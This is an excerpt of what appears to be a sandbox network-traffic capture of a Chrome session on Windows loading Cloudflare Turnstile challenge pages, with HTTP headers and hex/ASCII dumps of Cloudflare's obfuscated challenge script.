                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:03 UTC331INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:03 GMT
                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                  Content-Length: 115766
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a101ce8cd0c1b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:03 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 62 61 58 49 73 34 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65
                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.baXIs4={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconce
                                                                                                                  2024-10-22 14:09:03 UTC1369INData Raw: 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 74 75 72 6e 73 74 69
                                                                                                                  Data Ascii: %20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_verifying":"Verifying...","turnstile_feedback_description":"Send%20Feedback","turnsti
                                                                                                                  2024-10-22 14:09:03 UTC1369INData Raw: 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 4b 28 37 31 37 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 4b 28 36 38 33 29 29 2f 38 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 34 34 35 38 33 34 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 4c 28 37 34 39 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4d 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4d 3d 67 4c 2c 64 3d 7b 27 63 6e 52 4a 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 51 49 52 67 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69
                                                                                                                  Data Ascii: ))/6+-parseInt(gK(717))/7+parseInt(gK(683))/8,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,445834),eM=this||self,eN=eM[gL(749)],eO=function(gM,d,e,f,g){return gM=gL,d={'cnRJc':function(h,i){return h+i},'QIRgm':function(h,i){return h(i
                                                                                                                  2024-10-22 14:09:03 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 67 4d 28 35 34 30 29 5d 2c 66 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 4e 29 7b 72 65 74 75 72 6e 20 67 4e 3d 62 2c 67 4e 28 31 30 33 33 29 5b 67 4e 28 31 35 30 30 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 4f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 29 7b 69 66 28 67 4f 3d 67 4d 2c 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47
                                                                                                                  Data Ascii: nction(h,i){return h===i}},e=String[gM(540)],f={'h':function(h){return h==null?'':f.g(h,6,function(i,gN){return gN=b,gN(1033)[gN(1500)](i)})},'g':function(i,j,o,gO,s,x,B,C,D,E,F,G,H,I,J,K,L,M,N,O){if(gO=gM,i==null)return'';for(x={},B={},C='',D=2,E=3,F=2,G
                                                                                                                  2024-10-22 14:09:03 UTC1369INData Raw: 4f 28 35 35 34 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 67 4f 28 36 35 38 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 67 4f 28 31 30 35 37 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 67 4f 28 31 36 39 36 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 67 4f 28 36 35 38 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 67 4f 28 31 32 39 31 29 5d 28 48 3c 3c 31 2c 4f 26 31 29 2c 64 5b 67 4f 28 38 34 35 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 67 4f 28 31 36 39 36 29 5d 28 64 5b 67 4f 28 31 31 35 31 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4f 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4f 3d 31 2c 73 3d 30 3b 64
                                                                                                                  Data Ascii: O(554)](B,C)){if(256>C[gO(658)](0)){for(s=0;d[gO(1057)](s,F);H<<=1,j-1==I?(I=0,G[gO(1696)](o(H)),H=0):I++,s++);for(O=C[gO(658)](0),s=0;8>s;H=d[gO(1291)](H<<1,O&1),d[gO(845)](I,j-1)?(I=0,G[gO(1696)](d[gO(1151)](o,H)),H=0):I++,O>>=1,s++);}else{for(O=1,s=0;d
                                                                                                                  2024-10-22 14:09:03 UTC1369INData Raw: 29 2c 4b 3e 3e 3d 31 2c 64 5b 67 52 28 31 36 32 36 29 5d 28 30 2c 4b 29 26 26 28 4b 3d 6f 2c 4a 3d 73 28 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 67 52 28 31 32 30 31 29 5d 28 64 5b 67 52 28 39 35 36 29 5d 28 30 2c 4f 29 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 29 3b 73 77 69 74 63 68 28 4d 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 67 52 28 31 31 30 30 29 5d 28 32 2c 38 29 2c 49 3d 31 3b 64 5b 67 52 28 39 32 30 29 5d 28 49 2c 4e 29 3b 4f 3d 4a 26 4b 2c 4b 3e 3e 3d 31 2c 64 5b 67 52 28 37 32 36 29 5d 28 30 2c 4b 29 26 26 28 4b 3d 6f 2c 4a 3d 64 5b 67 52 28 33 37 35 29 5d 28 73 2c 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 67 52 28 31 32 30 31 29 5d 28 30 3c 4f 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 3b 50 3d 65 28 4d 29 3b 62 72 65 61 6b 3b
                                                                                                                  Data Ascii: ),K>>=1,d[gR(1626)](0,K)&&(K=o,J=s(L++)),M|=d[gR(1201)](d[gR(956)](0,O)?1:0,I),I<<=1));switch(M){case 0:for(M=0,N=Math[gR(1100)](2,8),I=1;d[gR(920)](I,N);O=J&K,K>>=1,d[gR(726)](0,K)&&(K=o,J=d[gR(375)](s,L++)),M|=d[gR(1201)](0<O?1:0,I),I<<=1);P=e(M);break;
                                                                                                                  2024-10-22 14:09:03 UTC1369INData Raw: 28 39 30 36 29 5d 28 31 65 33 2c 65 4d 5b 67 53 28 31 37 31 31 29 5d 5b 67 53 28 36 37 36 29 5d 28 32 2e 36 3c 3c 66 2c 33 32 29 29 2c 65 4d 5b 67 53 28 37 39 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 54 29 7b 69 66 28 67 54 3d 67 53 2c 67 54 28 38 34 31 29 3d 3d 3d 65 5b 67 54 28 31 32 32 31 29 5d 29 72 65 74 75 72 6e 3b 65 6c 73 65 20 65 4d 5b 67 54 28 35 31 34 29 5d 26 26 28 65 4d 5b 67 54 28 31 36 39 34 29 5d 5b 67 54 28 31 30 33 35 29 5d 28 29 2c 65 4d 5b 67 54 28 31 36 39 34 29 5d 5b 67 54 28 37 31 35 29 5d 28 29 2c 65 4d 5b 67 54 28 31 33 34 36 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 65 5b 67 54 28 39 30 39 29 5d 5d 5b 67 54 28 31 30 33 36 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 67 54 28 35 36 35 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 67
                                                                                                                  Data Ascii: (906)](1e3,eM[gS(1711)][gS(676)](2.6<<f,32)),eM[gS(794)](function(gT){if(gT=gS,gT(841)===e[gT(1221)])return;else eM[gT(514)]&&(eM[gT(1694)][gT(1035)](),eM[gT(1694)][gT(715)](),eM[gT(1346)]=!![],eM[e[gT(909)]][gT(1036)]({'source':e[gT(565)],'widgetId':eM[g
                                                                                                                  2024-10-22 14:09:03 UTC1369INData Raw: 31 35 37 29 5d 29 3b 69 66 28 6b 3d 68 7c 7c 67 55 28 36 30 30 29 2c 6c 3d 65 4d 5b 67 55 28 33 39 35 29 5d 5b 67 55 28 31 30 39 32 29 5d 3f 69 5b 67 55 28 38 34 34 29 5d 28 69 5b 67 55 28 38 34 39 29 5d 28 27 68 2f 27 2c 65 4d 5b 67 55 28 33 39 35 29 5d 5b 67 55 28 31 30 39 32 29 5d 29 2c 27 2f 27 29 3a 27 27 2c 6d 3d 69 5b 67 55 28 35 32 38 29 5d 28 69 5b 67 55 28 37 30 38 29 5d 2b 6c 2b 67 55 28 31 30 33 38 29 2b 31 2c 67 55 28 31 34 39 31 29 29 2b 65 4d 5b 67 55 28 33 39 35 29 5d 5b 67 55 28 31 33 34 33 29 5d 2b 27 2f 27 2b 65 4d 5b 67 55 28 33 39 35 29 5d 2e 63 48 2b 27 2f 27 2b 65 4d 5b 67 55 28 33 39 35 29 5d 5b 67 55 28 38 37 37 29 5d 2c 6e 3d 7b 7d 2c 6e 5b 67 55 28 36 30 36 29 5d 3d 65 4d 5b 67 55 28 33 39 35 29 5d 5b 67 55 28 36 30 36 29 5d 2c
                                                                                                                  Data Ascii: 157)]);if(k=h||gU(600),l=eM[gU(395)][gU(1092)]?i[gU(844)](i[gU(849)]('h/',eM[gU(395)][gU(1092)]),'/'):'',m=i[gU(528)](i[gU(708)]+l+gU(1038)+1,gU(1491))+eM[gU(395)][gU(1343)]+'/'+eM[gU(395)].cH+'/'+eM[gU(395)][gU(877)],n={},n[gU(606)]=eM[gU(395)][gU(606)],
                                                                                                                  2024-10-22 14:09:03 UTC1369INData Raw: 3d 7b 7d 2c 6e 5b 67 58 28 31 36 33 38 29 5d 3d 65 2c 6e 5b 67 58 28 34 39 32 29 5d 3d 66 2c 6e 5b 67 58 28 31 35 30 32 29 5d 3d 67 2c 6e 5b 67 58 28 31 35 38 39 29 5d 3d 68 2c 6e 5b 67 58 28 31 31 35 37 29 5d 3d 69 2c 6f 3d 6e 2c 65 4d 5b 67 58 28 37 39 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 5a 29 7b 67 5a 3d 67 58 2c 65 4d 5b 67 5a 28 36 35 32 29 5d 28 6f 2c 75 6e 64 65 66 69 6e 65 64 2c 6d 5b 67 5a 28 31 36 32 39 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 67 58 28 37 39 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 30 29 7b 68 30 3d 67 58 2c 65 4d 5b 68 30 28 37 38 32 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 67 58 28 31 32 38 36 29 5d 5b 67 58 28 31 32 34 38 29 5d 28 67 58 28 35 36 31 29 2c 65 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 73 3d
                                                                                                                  Data Ascii: ={},n[gX(1638)]=e,n[gX(492)]=f,n[gX(1502)]=g,n[gX(1589)]=h,n[gX(1157)]=i,o=n,eM[gX(794)](function(gZ){gZ=gX,eM[gZ(652)](o,undefined,m[gZ(1629)])},10),eM[gX(794)](function(h0){h0=gX,eM[h0(782)]()},1e3),eM[gX(1286)][gX(1248)](gX(561),e));continue;case'2':s=
                                                                                                                  2024-10-22 14:09:03 UTC1369INData Raw: 63 5b 69 77 28 33 39 31 29 5d 28 66 62 29 7d 2c 31 65 33 29 29 2c 66 56 3d 7b 7d 2c 66 56 5b 67 4c 28 31 31 38 32 29 5d 3d 21 5b 5d 2c 66 56 5b 67 4c 28 34 37 34 29 5d 3d 65 55 2c 66 56 5b 67 4c 28 38 37 39 29 5d 3d 66 4a 2c 66 56 5b 67 4c 28 39 30 38 29 5d 3d 66 4f 2c 66 56 5b 67 4c 28 37 31 39 29 5d 3d 66 50 2c 66 56 5b 67 4c 28 37 31 35 29 5d 3d 66 4b 2c 66 56 5b 67 4c 28 38 32 34 29 5d 3d 66 51 2c 66 56 5b 67 4c 28 31 31 35 35 29 5d 3d 66 4e 2c 66 56 5b 67 4c 28 31 36 35 39 29 5d 3d 66 4d 2c 66 56 5b 67 4c 28 31 34 38 31 29 5d 3d 66 38 2c 66 56 5b 67 4c 28 31 32 32 36 29 5d 3d 66 49 2c 66 56 5b 67 4c 28 31 32 31 38 29 5d 3d 66 48 2c 66 56 5b 67 4c 28 31 30 37 39 29 5d 3d 65 5a 2c 66 56 5b 67 4c 28 35 34 34 29 5d 3d 66 30 2c 66 56 5b 67 4c 28 35 36 39
                                                                                                                  Data Ascii: c[iw(391)](fb)},1e3)),fV={},fV[gL(1182)]=![],fV[gL(474)]=eU,fV[gL(879)]=fJ,fV[gL(908)]=fO,fV[gL(719)]=fP,fV[gL(715)]=fK,fV[gL(824)]=fQ,fV[gL(1155)]=fN,fV[gL(1659)]=fM,fV[gL(1481)]=f8,fV[gL(1226)]=fI,fV[gL(1218)]=fH,fV[gL(1079)]=eZ,fV[gL(544)]=f0,fV[gL(569


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  62192.168.2.1649805104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:04 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2056173471:1729602984:janUjwb74MX-m8qXT6ad2Z_xI1lxF850QjA1P3lVF8I/8d6a100ceca7e7db/lYFbgV1EjGkueHpW6EYxQQQEUNVfIQu82ev51.qUHPg-1729606140-1.1.1.1-dTHFouZjcc.yTEOsl29PZ8_pSIeeg9OdKhkIndp1UYbuUHEOFmLrYRiKjyBNFZ.0 HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Content-Length: 3271
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  CF-Challenge: lYFbgV1EjGkueHpW6EYxQQQEUNVfIQu82ev51.qUHPg-1729606140-1.1.1.1-dTHFouZjcc.yTEOsl29PZ8_pSIeeg9OdKhkIndp1UYbuUHEOFmLrYRiKjyBNFZ.0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Origin: https://challenges.cloudflare.com
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:04 UTC3271OUTData Raw: 76 5f 38 64 36 61 31 30 30 63 65 63 61 37 65 37 64 62 3d 48 4e 31 79 6a 79 61 79 58 79 5a 79 6a 51 32 6f 51 32 59 79 51 74 58 54 6a 6d 51 64 62 51 35 35 32 25 32 62 37 32 58 38 79 32 33 32 45 79 48 54 77 35 32 42 79 76 59 31 79 58 4a 4b 31 32 54 79 31 4e 51 37 30 77 31 79 32 4a 73 32 76 31 77 4b 32 4d 36 32 45 58 37 6b 31 62 32 68 79 77 6e 44 32 68 37 38 77 64 32 51 74 32 69 32 64 45 58 71 5a 6d 74 4d 54 4e 55 61 79 77 62 69 32 30 38 58 2d 6c 34 39 78 37 42 39 35 66 55 36 48 6f 62 4a 79 53 4e 32 6e 34 56 46 73 32 58 44 53 32 32 46 62 76 31 79 42 6e 74 32 42 76 54 64 70 37 6a 6e 76 79 58 51 32 51 4e 74 68 63 78 31 32 64 78 35 30 6a 78 72 68 71 79 32 51 79 77 53 76 79 58 57 79 49 71 72 2b 38 51 57 76 31 4d 67 32 64 73 79 2b 38 4e 4b 58 4d 74 32 6f 79 77 33
                                                                                                                  Data Ascii: v_8d6a100ceca7e7db=HN1yjyayXyZyjQ2oQ2YyQtXTjmQdbQ552%2b72X8y232EyHTw52ByvY1yXJK12Ty1NQ70w1y2Js2v1wK2M62EX7k1b2hywnD2h78wd2Qt2i2dEXqZmtMTNUaywbi208X-l49x7B95fU6HobJySN2n4VFs2XDS22Fbv1yBnt2BvTdp7jnvyXQ2QNthcx12dx50jxrhqy2QywSvyXWyIqr+8QWv1Mg2dsy+8NKXMt2oyw3
                                                                                                                  2024-10-22 14:09:04 UTC434INHTTP/1.1 400 Bad Request
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:04 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 14
                                                                                                                  Connection: close
                                                                                                                  cf-chl-out: kvEOcHjVGFYWPDOzS49vTBQU+bJBrwAuGiD2/iV1/B/cDwPvKNqbnrTaYZxPBLFNmbH8+lEmiGDfr+g7ZhKiUC/i$qbx9p37D7iNKWodz
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a1021bbbc2ccf-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:04 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 31 30 32 30 30 7d
                                                                                                                  Data Ascii: {"err":110200}


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  63192.168.2.1649812104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:15 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv1/bpy9ZfXXCgwSaYHz/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                  Referer: https://5102487645.my.id/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:15 UTC433INHTTP/1.1 500 Internal Server Error
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:15 GMT
                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                  Content-Length: 15
                                                                                                                  Connection: close
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Referrer-Policy: same-origin
                                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d6a10668e112c9e-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:15 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 30
                                                                                                                  Data Ascii: error code: 500


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  64192.168.2.1649817104.18.95.414432276C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-10-22 14:09:22 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv1/bpy9ZfXXCgwSaYHz/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                  Referer: https://5102487645.my.id/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-10-22 14:09:22 UTC1368INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 22 Oct 2024 14:09:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 26708
                                                                                                                  Connection: close
                                                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                  cross-origin-opener-policy: same-origin
                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                  referrer-policy: same-origin
                                                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                  cross-origin-embedder-policy: require-corp
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  origin-agent-cluster: ?1
                                                                                                                  document-policy: js-profiling
                                                                                                                  2024-10-22 14:09:22 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 36 61 31 30 39 34 37 38 36 39 36 62 39 61 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8d6a109478696b9a-DFWalt-svc: h3=":443"; ma=86400
                                                                                                                  2024-10-22 14:09:22 UTC1288INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
